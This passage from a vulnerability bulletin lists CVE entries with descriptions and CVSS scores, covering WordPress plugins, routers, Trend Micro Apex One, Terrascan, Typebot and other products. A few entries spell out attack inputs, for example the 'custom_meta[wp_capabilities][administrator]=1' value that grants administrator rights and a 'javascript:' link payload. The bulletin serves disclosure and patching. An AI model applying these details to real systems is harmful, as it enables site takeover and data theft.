| Taiko Network Communications Pte Ltd.--AG1000-01A SMS Alert Gateway | Taiko AG1000-01A SMS Alert Gateway Rev 7.3 and Rev 8 contains an authentication bypass vulnerability in the embedded web configuration interface that allows unauthenticated attackers to access internal application pages without any session management or server-side authentication checks. Attackers with network access can directly request internal resources such as index.zhtml, point.zhtml, and log.shtml to gain full administrative read and write access, enabling unauthorized modification of alarm routing, device configuration, and disruption of monitoring and control functions. | 2026-05-20 | 9.8 | CVE-2026-9141 |
| Taiko Network Communications Pte Ltd.--AG1000-01A SMS Alert Gateway | Taiko AG1000-01A SMS Alert Gateway Rev 7.3 and Rev 8 contains a stored cross-site scripting vulnerability in the embedded web configuration interface that allows authenticated attackers to execute persistent JavaScript by fragmenting malicious payloads across multiple administrative form fields. Attackers can bypass front-end length restrictions using JavaScript comments and template literals to concatenate executable script fragments that are rendered in administrative dashboard views such as index.zhtml, resulting in persistent script execution within administrative sessions. | 2026-05-20 | 7.6 | CVE-2026-9144 |
| Talend--Talend Administration Center | A broken access control issue has been identified in the Talend Administration Center that allows a user with "View" permission to modify the Talend Studio update URL. This issue was resolved in a patch, which is already available. | 2026-05-20 | 8.2 | CVE-2026-9057 |
| tenable--Terrascan | Terrascan v1.18.3 and prior are vulnerable to Server-Side Request Forgery (SSRF) via the webhook_url parameter in the file scan endpoint (POST /v1/{iac}/{iacVersion}/{cloud}/local/file/scan) when running in server mode. An unauthenticated remote attacker can supply an arbitrary URL as the webhook_url multipart form parameter. After scanning the uploaded file, Terrascan sends an HTTP POST request to the attacker-controlled URL containing the full scan results as a JSON body, with the attacker-supplied webhook_token forwarded as a Bearer token in the Authorization header. The retryable HTTP client retries up to 10 times on failure. This affects deployments running terrascan in server mode (terrascan server), which binds to 0.0.0.0 with no authentication. Note: Terrascan was archived in August 2023 and no patch will be released. | 2026-05-19 | 7.5 | CVE-2026-47356 |
| tenable--Terrascan | Terrascan v1.18.3 and prior are vulnerable to Server-Side Request Forgery (SSRF) via the remote_url parameter in the remote directory scan endpoint (POST /v1/{iac}/{iacVersion}/{cloud}/remote/dir/scan) when running in server mode. An unauthenticated remote attacker can supply an attacker-controlled HTTP URL as remote_url with remote_type set to "http". The URL is passed directly to hashicorp/go-getter (v1.7.5) without validation. Go-getter's HttpGetter supports the X-Terraform-Get response header, allowing the attacker's server to redirect the download to a file:// URL, enabling local file read. Additionally, HttpGetter has Netrc set to true, causing it to read ~/.netrc and send stored credentials to attacker-controlled hostnames. This affects deployments running terrascan in server mode (terrascan server), which binds to 0.0.0.0 with no authentication. Note: Terrascan was archived in August 2023 and no patch will be released. | 2026-05-19 | 7.5 | CVE-2026-47357 |
| tenable--Terrascan | Terrascan v1.18.3 and prior are vulnerable to Server-Side Request Forgery (SSRF) via external URL resolution in uploaded IaC templates when running in server mode. When Terrascan parses uploaded ARM templates or CloudFormation templates, it resolves external URLs referenced within those templates via hashicorp/go-getter with all default detectors enabled, including FileDetector. An unauthenticated remote attacker can upload an ARM template containing a templateLink.uri or parametersLink.uri field, or a CloudFormation template containing an AWS::CloudFormation::Stack TemplateURL field, pointing to an attacker-controlled URL. Terrascan will fetch the attacker-controlled URL server-side. Unlike SSRF via the remote scan endpoint, file:// URLs are directly usable without requiring an X-Terraform-Get redirect, enabling local file read. This affects deployments running terrascan in server mode (terrascan server), which binds to 0.0.0.0 with no authentication. Note: Terrascan was archived in August 2023 and no patch will be released. | 2026-05-19 | 7.5 | CVE-2026-47358 |
| Tenda--F456 | A security vulnerability has been detected in Tenda F456 1.0.0.5. This affects the function frmL7ImForm of the file /goform/L7Im. Manipulation of the argument page leads to a buffer overflow. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-05-24 | 8.8 | CVE-2026-9389 |
| themefusion--Avada (Fusion) Builder | The Avada Builder (fusion-builder) plugin for WordPress is vulnerable to Unauthenticated Remote Code Execution via PHP Function Injection in versions up to and including 3.15.2. This is due to the `wp_conditional_tags` case in `Fusion_Builder_Conditional_Render_Helper::get_value()` passing attacker-controlled values from a base64-decoded JSON blob directly to `call_user_func()` without any allowlist validation. This is exploitable by unauthenticated attackers through the `fusion_get_widget_markup` AJAX endpoint, which is registered for non-privileged (unauthenticated) users via `wp_ajax_nopriv_fusion_get_widget_markup`. The endpoint is protected only by a nonce (`fusion_load_nonce`), but this nonce is generated for user ID 0 and is deterministically exposed in the JavaScript output of any public-facing page containing a Post Cards (`[fusion_post_cards]`) or Table of Contents (`[fusion_table_of_contents]`) element. This makes it possible for unauthenticated attackers to execute arbitrary code on affected sites. | 2026-05-21 | 9.8 | CVE-2026-6279 |
| themeum--Kirki Freeform Page Builder, Website Builder & Customizer | The Kirki - Freeform Page Builder, Website Builder & Customizer plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation and missing capability check in the 'downloadZIP' function in all versions up to, and including, 6.0.6. This makes it possible for unauthenticated attackers to read and delete arbitrary files limited to the WordPress uploads base directory. | 2026-05-19 | 7.5 | CVE-2026-8073 |
| themewant--Easy Elements for Elementor Addons & Website Templates | The Easy Elements for Elementor - Addons & Website Templates plugin for WordPress is vulnerable to privilege escalation via user registration in all versions up to, and including, 1.4.4. This is due to the 'easyel_handle_register' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. | 2026-05-20 | 9.8 | CVE-2026-7284 |
| themewant--Easy Elements for Elementor Addons & Website Templates | The Easy Elements for Elementor - Addons & Website Templates plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.4.5 via the `easyel_handle_register()` function. This is due to the `wp_ajax_nopriv_eel_register` AJAX handler iterating the attacker-controlled `custom_meta` POST array and writing every supplied key-value pair to the newly created user's meta via `update_user_meta()` without any key whitelist or blocklist, allowing the `wp_capabilities` user meta key to be overwritten after `wp_insert_user()` has already assigned a safe role. This makes it possible for unauthenticated attackers to register a new account with full administrator-level privileges by supplying `custom_meta[wp_capabilities][administrator]=1`. Exploitation requires that user registration is enabled on the site and that at least one page exposes the Login/Register widget, which publishes the required `easy_elements_nonce` into the page DOM where it can be retrieved by any unauthenticated visitor via a simple GET request. | 2026-05-22 | 8.8 | CVE-2026-9018 |
| TONNET--TPR7308 | E-LAN Hybrid Recording System developed by TONNET has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2026-05-20 | 7.5 | CVE-2026-9003 |
| Totolink--A8000RU | A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulation of the argument ip results in OS command injection. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-05-24 | 9.8 | CVE-2026-9384 |
| Totolink--A8000RU | A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulation of the argument command causes OS command injection. The attack can be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-24 | 9.8 | CVE-2026-9385 |
| Totolink--A8000RU | A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulation of the argument lang leads to OS command injection. The attack may be performed remotely. The exploit is publicly available and might be used. | 2026-05-24 | 9.8 | CVE-2026-9386 |
| Totolink--A8000RU | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function setUpgradeFW of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulating the argument resetFlags results in OS command injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-24 | 9.8 | CVE-2026-9387 |
| Totolink--A8000RU | A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. The impacted element is the function setScheduleCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulating the argument mode can lead to OS command injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-24 | 9.8 | CVE-2026-9388 |
| Totolink--A8000RU | A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setDdnsCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulation of the argument provider leads to OS command injection. The attack may be launched remotely. The exploit is publicly available and might be used. | 2026-05-24 | 9.8 | CVE-2026-9404 |
| Totolink--A8000RU | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. This impacts the function setGameSpeedCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulating the argument enable results in OS command injection. The attack can be exploited remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-24 | 9.8 | CVE-2026-9405 |
| Totolink--A8000RU | A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. Affected is the function setRemoteCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulating the argument enable can lead to OS command injection. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-24 | 9.8 | CVE-2026-9406 |
| Totolink--A8000RU | A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b20200521. Affected by this vulnerability is the function setFirewallType of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulation of the argument firewallType leads to OS command injection. The attack can be carried out remotely. The exploit has been disclosed publicly and may be used. | 2026-05-24 | 9.8 | CVE-2026-9407 |
| Trend Micro, Inc.--TrendAI Apex One | A vulnerability in the Trend Micro Apex One management console could allow a remote attacker to upload malicious code and execute commands on affected installations. Please note: although this vulnerability carries a technical critical CVSS rating, this was reported via responsible disclosure via a researcher through the Zero Day Initiative. The SaaS versions of the product have already been mitigated and no customer action required. For this particular vulnerability, an attacker must have access to the Trend Micro Apex One Management Console, so customers that have their console's IP address exposed externally should consider mitigating factors such as source restrictions if not already applied. | 2026-05-21 | 9.8 | CVE-2025-71210 |
| Trend Micro, Inc.--TrendAI Apex One | A vulnerability in the Trend Micro Apex One management console could allow a remote attacker to upload malicious code and execute commands on affected installations. This vulnerability is similar in scope to CVE-2025-71210 but affects a different executable. Please note: although this vulnerability carries a technical critical CVSS rating, this was reported via responsible disclosure via a researcher through the Zero Day Initiative. The SaaS versions of the product have already been mitigated and no customer action required. For this particular vulnerability, an attacker must have access to the Trend Micro Apex One Management Console, so customers that have their console's IP address exposed externally should consider mitigating factors such as source restrictions if not already applied. | 2026-05-21 | 9.8 | CVE-2025-71211 |
| Trend Micro, Inc.--TrendAI Apex One | A link following vulnerability in the Trend Micro Apex One scan engine could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2025-71212 |
| Trend Micro, Inc.--TrendAI Apex One | An origin validation error vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2025-71213 |
| Trend Micro, Inc.--TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-34927 |
| Trend Micro, Inc.--TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-34927 but exists in a different named pipe communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-34928 |
| Trend Micro, Inc.--TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-34927 but exists in a different inter-process communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-34929 |
| Trend Micro, Inc.--TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-34927 but exists in a different process protection mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-34930 |
| Trend Micro, Inc.--TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-45207 but exists in a different process protection communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-45206 |
| Trend Micro, Inc.--TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-45206 but exists in a different process protection communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-45207 |
| Trend Micro, Inc.--TrendAI Apex One | A time-of-check time-of-use vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-45208 |
| TriliumNext--Trilium | Trilium Notes is a cross-platform, hierarchical note taking application focused on building large personal knowledge bases. In versions 0.102.1 and prior, the Clipper API in Trilium Desktop (v0.101.3) allows full authentication bypass when running in an Electron environment. When Trilium detects an Electron environment, it explicitly disables authentication middleware for the Clipper API, exposing endpoints such as /api/clipper/notes to the network with no password, API token, or CSRF protection. An attacker on a shared network (for example, a corporate LAN or public Wi-Fi) can scan for open high-range ports using a tool like nmap, since Trilium often binds to ports such as 37840. Once a candidate port is found, an unauthenticated request to the Clipper handshake endpoint, which also bypasses authentication, confirms a Trilium instance by returning the application name and protocol version. This facilitates unauthorized data access, phishing, and local system compromise. The issue has been fixed in version 0.102.2. | 2026-05-20 | 8.6 | CVE-2026-39310 |
| twigphp--Twig | Twig versions 2.16.x and 3.9.0 through 3.25.x contain a sandbox bypass vulnerability when using a SourcePolicyInterface that allows attackers with template rendering capabilities to pass arbitrary PHP callables to sort, filter, map, and reduce filters. Attackers can exploit the runtime check that fails to use the current template source to bypass sandbox restrictions and execute arbitrary code when the sandbox is enabled through a source policy rather than globally. | 2026-05-20 | 8.8 | CVE-2026-24425 |
| Tyler Technologies--TID-L | Tyler Identity Local (TID-L) uses documented, default administrative credentials. Users are not required to change the credentials before deployment. TID-L has not been distributed since December 2020, and has not been supported since 2021. | 2026-05-19 | 9.8 | CVE-2026-44159 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system. | 2026-05-22 | 10 | CVE-2026-34908 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network could exploit a Path Traversal vulnerability found in UniFi OS devices to access files on the underlying system that could be manipulated to access an underlying account. | 2026-05-22 | 10 | CVE-2026-34909 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection. | 2026-05-22 | 10 | CVE-2026-34910 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network and high privileges could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection. | 2026-05-22 | 9.1 | CVE-2026-33000 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network and low privileges could exploit a Path Traversal vulnerability found in UniFi OS devices to access files on the underlying system that could be manipulated to obtain sensitive information. | 2026-05-22 | 7.7 | CVE-2026-34911 |
| ultimate-form-builder-lite--Ultimate Form Builder Lite | WordPress Ultimate Form Builder Lite plugin version 1.3.7 and below contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the entry_id POST parameter. Attackers can send POST requests to the admin-ajax.php endpoint with the ufbl_get_entry_detail_action action to extract, modify, or escalate privileges within the WordPress database. | 2026-05-23 | 7.1 | CVE-2018-25352 |
| UserSpice--userSpice | userSpice 4.3.24 contains a username enumeration vulnerability that allows unauthenticated attackers to discover valid usernames by sending POST requests to the existingUsernameCheck.php endpoint. Attackers can submit usernames and analyze response text for the 'taken' string to identify existing accounts in the system. | 2026-05-23 | 9.8 | CVE-2018-25350 |
| web-dorado--Contact Form Maker | WordPress Contact Form Maker Plugin 1.12.20 contains SQL injection vulnerabilities that allow authenticated attackers to manipulate database queries through the FormMakerSQLMapping and generete_csv_fmc AJAX actions. Attackers can inject malicious SQL code via the 'name' and 'search_labels' parameters to extract sensitive database information or escalate privileges. | 2026-05-23 | 7.1 | CVE-2018-25347 |
| webdriverio--webdriverio | WebdriverIO is a test automation framework for unit, e2e and component testing using WebDriver, WebDriver BiDi and Appium. Versions below 9.24.0 contain a command injection vulnerability leading to remote code execution (RCE) in test orchestration. Git permits branch names containing shell metacharacters, and getGitMetadataForAISelection() interpolates these names directly into execSync() calls without sanitization. An attacker can exploit this by supplying a malicious repository (via testOrchestrationOptions.runSmartSelection.source, or the current directory if unset) whose branch name carries a payload, causing the shell to execute arbitrary code. This enables remote code execution on CI/CD servers and developer machines, leading to credential and secret disclosure, source code and SSH key exfiltration, system compromise, and supply chain attacks via tampered build artifacts. The issue has been fixed in version 9.24.0. | 2026-05-18 | 9.8 | CVE-2026-25244 |
| weDevs--WP ERP Pro | The WP ERP Pro plugin for WordPress is vulnerable to SQL Injection via the 'search_key' parameter in all versions up to, and including, 1.5.1. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-22 | 7.5 | CVE-2026-4834 |
| windmill-labs--windmill | Windmill prior to 1.703.2 contains an incorrect default permissions vulnerability in nsjail sandbox configuration files where /etc is bind-mounted without read-write restrictions, allowing authenticated users to write arbitrary entries to /etc/hosts, /etc/resolv.conf, and /etc/ssl/certs/ca-certificates.crt from within script execution sandboxes. Attackers can exploit persistent poisoned entries across all subsequent script executions on the same worker pod to redirect hostnames, intercept DNS queries, perform transparent HTTPS man-in-the-middle attacks, and intercept WM_TOKEN JWTs to gain workspace-admin access to other users' workspaces. | 2026-05-19 | 8.1 | CVE-2026-47107 |
| Wishlist Member--Wishlist Member | The WishList Member plugin for WordPress is vulnerable to Privilege Escalation via Missing Authorization in versions up to and including 3.30.1. This is due to the missing capability and nonce check in the ajax_get_screen() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to supply an arbitrary admin screen identifier via the data[url] parameter, causing the plugin to load and execute the administrative API configuration template without authorization. The rendered HTML, which contains the plugin's plaintext REST API Secret Key, is returned directly to the attacker in the AJAX JSON response. An attacker who obtains this key can authenticate to the WishList Member API, create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. | 2026-05-23 | 8.8 | CVE-2026-6419 |
| Wishlist Member--Wishlist Member | The WishList Member plugin for WordPress is vulnerable to Missing Authorization leading to Sensitive Information Disclosure and Privilege Escalation in versions up to and including 3.30.1. This is due to the missing capability checks in the 'export_settings' function. This function returns the REST API Secret Key to the attacker in the AJAX JSON response. An attacker who obtains this key can authenticate to the WishList Member API, create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. | 2026-05-23 | 8.8 | CVE-2026-6895 |
| Wishlist Member--Wishlist Member | The Wishlist Member plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'WishListMember\Features\Team_Accounts::save_settings' function in all versions up to, and including, 3.30.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary plugin options, including the REST API Secret Key, which can be used to create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. | 2026-05-23 | 8.8 | CVE-2026-6897 |
| Wishlist Member--Wishlist Member | The Wishlist Member plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'WishListMember3_Hooks::generate_api_key' function in all versions up to, and including, 3.30.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the REST API Secret Key, which can be used to create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. | 2026-05-23 | 8.8 | CVE-2026-6898 |
| woocommerce--WooCommerce PayPal Payments | The WooCommerce PayPal Payments plugin for WordPress is vulnerable to unauthorized order manipulation and information disclosure due to missing authorization checks on the `ppc-create-order` and `ppc-get-order` WC-AJAX endpoints in all versions up to, and including, 4.0.1. The `ppc-create-order` endpoint accepts an arbitrary WooCommerce order ID in the `pay-now` context without validating order ownership, allowing attackers to create PayPal orders for any WC order and write PayPal metadata to it. The `ppc-get-order` endpoint returns full PayPal order details for any PayPal order ID without binding to the requester's session. This makes it possible for unauthenticated attackers to chain these endpoints to manipulate other customers' order payment flows and exfiltrate sensitive order details (payer information, shipping data) by creating a PayPal order for a victim's WC order and then retrieving the PayPal order data. | 2026-05-23 | 8.2 | CVE-2026-9284 |
| Wp Directory Kit--WP Directory Kit | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Wp Directory Kit WP Directory Kit allows Blind SQL Injection. This issue affects WP Directory Kit: from n/a through 1.5.0. | 2026-05-21 | 9.3 | CVE-2026-39531 |
| WP Swings--Gift Cards For WooCommerce Pro | Unrestricted Upload of File with Dangerous Type vulnerability in WP Swings Gift Cards For WooCommerce Pro allows Using Malicious Files. This issue affects Gift Cards For WooCommerce Pro: from n/a through 4.2.6. | 2026-05-20 | 10 | CVE-2026-45444 |
| yiisoft--yii2 | Yii 2 is a PHP application framework. Versions 2.0.54 and prior contain flawed logic in the core view rendering method View::renderPhpFile() that leads to Local File Inclusion. The function calls extract($_params_, EXTR_OVERWRITE) before the require statement that loads the view file. As a result, a caller-controlled _file_ key in the $params array overwrites the internal local variable specifying which file to include, potentially enabling RCE if an attacker can write PHP files through a separate primitive, as well as information disclosure. This issue has been fixed in version 2.0.55. | 2026-05-20 | 7.4 | CVE-2026-39850 |
| YITH--YITH WooCommerce Product Add-Ons | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in YITH YITH WooCommerce Product Add-Ons allows Blind SQL Injection. This issue affects YITH WooCommerce Product Add-Ons: from n/a through 4.29.0. | 2026-05-20 | 7.6 | CVE-2026-42383 |
| ZKTeco--SSC335-GC2063-Face-0b77 Solution Camera | An undocumented configuration export port is accessible on some models of ZKTeco CCTV cameras. This port does not require authentication and exposes critical information about the camera such as open services and camera account credentials. | 2026-05-20 | 9.1 | CVE-2026-8598 |
| Zohocorp--ManageEngine ADSelfService Plus | Zohocorp ManageEngine ADSelfService Plus versions before 6525, DataSecurity Plus before 6264 and RecoveryManager Plus before 6313 are vulnerable to authenticated remote code execution on the agent machines due to a bug in a third-party dependency. | 2026-05-21 | 8.4 | CVE-2026-2740 |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 546669204--vps-inventory-monitoring | A vulnerability was determined in 546669204 vps-inventory-monitoring up to 98c00b370668c96ae75e91c15548d9ea113652d9. This issue affects the function eval of the file app/index/command/VpsTest.php of the component VpsTest Console. Executing a manipulation of the argument vf can lead to code injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-23 | 6.3 | CVE-2026-9302 | VDB-365249 (546669204 vps-inventory-monitoring VpsTest Console VpsTest.php eval code injection); CTI Indicators (IOB, IOC, TTP, IOA); Submit #811843 (546669204 vps-inventory-monitoring <=98c00b3 Code Injection / Eval Injection); https://github.com/546669204/vps-inventory-monitoring/issues/36 https://github.com/dntyfate/cve/issues/2 https://github.com/546669204/vps-inventory-monitoring/ |
| ADD-ONS.ORG--PDF for Elementor Forms + Drag And Drop Template Builder | Missing Authorization vulnerability in ADD-ONS.ORG PDF for Elementor Forms + Drag And Drop Template Builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PDF for Elementor Forms + Drag And Drop Template Builder: from n/a through 5.5.1. | 2026-05-20 | 5 | CVE-2026-45443 | https://patchstack.com/database/wordpress/plugin/pdf-for-elementor-forms/vulnerability/wordpress-pdf-for-elementor-forms-drag-and-drop-template-builder-plugin-5-5-1-broken-access-control-vulnerability?_s_id=cve |
| askywhale--Games Catalog | The Games Catalog plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.0. This is due to missing or incorrect nonce validation on the gc_crud() function which handles the delete action (action=delete) via a GET request without any wp_verify_nonce() / check_admin_referer() call. This makes it possible for unauthenticated attackers to delete arbitrary game catalog entries (including the associated WordPress post created for the game) via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-8418 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0888cda8-63ca-44f6-a3eb-765c14a7e6c7?source=cve https://plugins.trac.wordpress.org/browser/game-catalog/trunk/admin-crud.php#L94 https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/admin-crud.php#L94 https://plugins.trac.wordpress.org/browser/game-catalog/trunk/admin-crud.php#L31 https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/admin-crud.php#L31 https://plugins.trac.wordpress.org/browser/game-catalog/trunk/games-catalog.php#L96 https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/games-catalog.php#L96 |
| baptisteArno--typebot.io | Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the getResultLogs API endpoint authorizes the caller against the provided typebotId but fetches logs solely by resultId without verifying that the result belongs to the authorized typebot, leading to IDOR. An authenticated attacker can supply their own typebotId alongside any victim's resultId to read execution logs from other workspaces, leaking sensitive data including HTTP response bodies, AI model outputs, and webhook payloads. Every other result-scoped endpoint in the same router properly validates that the resultId belongs to the authorized typebotId, which confirms the missing check is an oversight rather than a design choice. This issue has been fixed in version 3.16.0. | 2026-05-22 | 6.5 | CVE-2026-28444 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-c63p-mqx5-75r7 https://github.com/baptisteArno/typebot.io/commit/d82b2d47c86ae614a08d4073c669ca64442faff2 https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. In version 3.15.2, the getLinkedTypebots API endpoint returns full bot definitions to any authenticated user who references a target bot ID in a Typebot Link block, regardless of workspace ownership, leading to IDOR. The authorization check uses Array.filter() with an async callback; since filter() is synchronous, the callback always returns a truthy Promise, so the access control predicate is never actually evaluated. Any authenticated Typebot user can read the full definition of any other workspace's private bots, including all conversation blocks and logic flow, variable values embedded in the bot (credentials, API keys, PII), webhook URLs and integration configurations. This issue has been fixed in version 3.16.0. | 2026-05-22 | 6.5 | CVE-2026-39966 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-3fr5-999r-84qj https://github.com/baptisteArno/typebot.io/commit/b9530a089b43bfa6e79e3ff9cbfab921ce832f45 https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. In versions 3.16.0 and prior, the WhatsApp Cloud API webhook endpoint (POST /v1/workspaces/{workspaceId}/whatsapp/{credentialsId}/webhook) does not verify the x-hub-signature-256 HMAC signature included by Meta in every webhook delivery. The webhook URL exposes both workspaceId and credentialsId as path parameters, which are logged in web server access logs, visible in Meta's webhook configuration dashboard, and potentially shared when configuring integrations. This allows any unauthenticated attacker to send spoofed webhook messages to trigger bot flows, consume API resources, and interact with external services using the workspace owner's credentials. The issue has been fixed in version 3.17.0. | 2026-05-22 | 6.5 | CVE-2026-39969 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-8vqp-r5w7-v47f https://github.com/baptisteArno/typebot.io/releases/tag/v3.17.0 |
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. In versions prior to 3.16.0, the Typebot viewer (packages/embeds/js) renders anchor tags from rich text bubble content without filtering the javascript: URI scheme. A bot author can set a link URL to javascript:PAYLOAD, which executes in the visitor's browser context when clicked. Since the viewer is typically embedded in a third-party site, the attacker's JavaScript runs in the host page's origin and can exfiltrate cookies and session tokens. Any authenticated Typebot user (including those on the free tier) can create a bot carrying this payload, and because shared bots are publicly accessible, no victim authentication is required. This issue has been resolved in version 3.16.0. | 2026-05-22 | 5.4 | CVE-2026-39964 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-hqmv-v56g-4m47 https://github.com/baptisteArno/typebot.io/commit/2c3fc7267a5e1529ba4b1a2ab4f1edb3e3b8990b https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| Behance--Smartshop | Smartshop 1 contains a cross-site request forgery vulnerability that allows attackers to modify user profiles by tricking authenticated users into submitting malicious requests. Attackers can craft HTML forms targeting editprofile.php with hidden fields for email and password parameters that execute automatically when visited by an authenticated admin user. | 2026-05-23 | 4.3 | CVE-2018-25343 | ExploitDB-44824 Official Product Homepage Product Reference VulnCheck Advisory: Smartshop 1 Cross-Site Request Forgery via editprofile.php |
